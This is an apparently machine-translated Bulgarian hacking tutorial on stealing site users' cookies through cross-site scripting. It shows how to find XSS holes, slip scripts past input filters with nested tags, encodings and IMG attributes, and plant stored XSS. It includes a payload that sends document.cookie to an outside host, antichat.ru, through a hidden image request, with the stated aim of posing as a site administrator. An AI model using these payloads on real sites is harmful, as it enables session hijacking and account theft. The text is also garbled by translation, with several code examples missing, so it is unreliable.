Кражбата бисквитка от XSS

XSS този Css =) Cross Site Scripting

Да не се бърка с CSS наричан XSS

Какво е бисквитка и защо XSS?

Cookie - е обикновен текстов файл на клиентската машина и се използва за съхраняване на информация сървър.

Например, след като се регистрирате и да влезете във форума, сайтът съхранява в информацията за бисквитка за теб. Там обикновено съхранява информация за

вашия потребител и парола. По-късно форум чете данните и дефинира. Друг пример: вие сте администратора на сайта, и аз

проста за употреба. Но ако мога да променям данните на собствения си, аз също ще се определя от системата като администратор. Затова

трябва да бъде в състояние да открадне същите тези бисквитки.

Какво е XSS атака?

XSS атаки - това е атака не на самото място, но от потребителите на сайта.

XSS - това е дефект в прилагането на филтъра.

Има пасивна и активна XSS XSS.

Пасивно - това XSS, които изискват прякото участие на жертвите имат специфичен +

ограничения и сложност. Ето защо, пасивен XSS не се цени високо. Например, трябва да я получите, за да отидете на отровни връзка

Active - е XSS, които не изискват никакви допълнителни действия от страна на жертвата - това е достатъчно

трябва само да отворите страницата с XSS и Java код ще се изпълни автоматично. Благодарение на автоматизация - те са много полезни и ценни.

Например, активното ХСС съществуват в ББ- тагове, поради недостатъчен филтриране, когато оставяте съобщение на forumegostevuhechate,

който е винаги активно с всяка актуализация.

Как да намерите XSS на този сайт?

Опитвайки се да се поставите, където е възможно върху етикет сайт (скрипт) предупреждение () (/ скрипт). Ако напусна съобщение,

след това заредете сценария, и сте намерили XSS.

Помислете за друг XSS ") (скрипт) предупреждение () (/ скрипт) Какво се случва в същото време :. Ние

Затварящият таг ") (вероятно някои променлива се определя с текста, че ние сме за въвеждане в матрицата) и се изпълнява

Как да се определи дали е филтъра?

За да направите това, всички полета за въвеждане "; -" (Fuck) =

След това отворете страницата и за думата дяволите, както и другите герои изглеждат:

Ако () наляво, това е първият признак на уязвимост. Ако има герои ''. Това е вторият знак

Ако не можете да намерите (), е вероятно, че те изяде филтър. Е, ако те са били заменени с други герои, а след това уви,

Филтър работи добре.

Какво става, ако филтъра лястовици ().

Ние се опитваме да вмъкнете (kdgfjdgfd), изглежда, ако се погълне - поставете битка сценария.

Има и начини да се инвестират сценария: (SC (скрипт) ript) предупреждение () (/ SC (/ скрипт) ript). Това ще ви помогне, когато

филтъра не е много силна.

Това се случва, че филтърът се брои броя отворени и затворени тагове и се затваря в себе, а след това ще ви помогне:

Често се случва, че филтъра завърши сценария, например като този:

Можете да се опитате да използвате различно кодиране и се опитват да се кодира скрипт.

Ние трябва да се опитаме на пробата и грешката.

Ние трябва да се опитаме да въведете различни стойности, виж това, което имаме от филтъра. метод tykov да се разбере как работи филтъра,

какви дефекти му. Ако лош филтър, винаги е възможно да се вмъкне сценария.

Например, само упълномощени етикети могат да бъдат използвани в сайта, след което се крие зад тях имат възможност да го изпълняват. Например, този маркер

IMG, URL адрес. Целият смисъл е, че ние трябва да поставите нашето искане в създаването IMG или URL адрес. Img Имаме много опции

с изключение на ALT и SRC, които могат да бъдат използвани в книгата за гости и форумите.

Помислете за активно XSS

Намерени XSS и активен вместо предупреждение (), можете да вмъкнете скрипт

Ако филтърът не е предал да опитате това:

На тази страница от началото на този маркер:

В действителност, на сигнала () няма да направи нищо полезно (това е необходимо само да се провери). Но самата сценария:

Той вече е кражба бисквитки

е могъл да замести:

където ") (скрипт) IMG = нова снимка (); img.src = "? http://antichat.ru/cgi-bin/s.jpg" + document.cookie; сценария

2) по-сигурен скрипт като например:

вече има жалба до My.js файл, който съдържа

(Сценарий) IMG = нова снимка (); img.src = "? http://antichat.ru/cgi-bin/s.jpg" + document.cookie;

Така че по-безопасно.

Понякога, когато трябва да криптирате. Ето например:

След това се обадете на файла, например 1.jpg и място на сайта. Реакцията е както следва:

По това време ние завърши линии

ни боравене с документи за обучени да изпрати бисквитка.

Между другото, за разлика от част от процеса, този образ не е изведен

под формата на кръст, като същата има скрит атрибут (стил = дисплей: няма), а в случай на размер 1x1. След получаване на бисквитката, без да ни

По избор: ако мине през IE, сценария ще работи, а ако в Opera, сценарият не работи и ще премине. И ако не го преименувате HTML, а след това на операта ще работи също.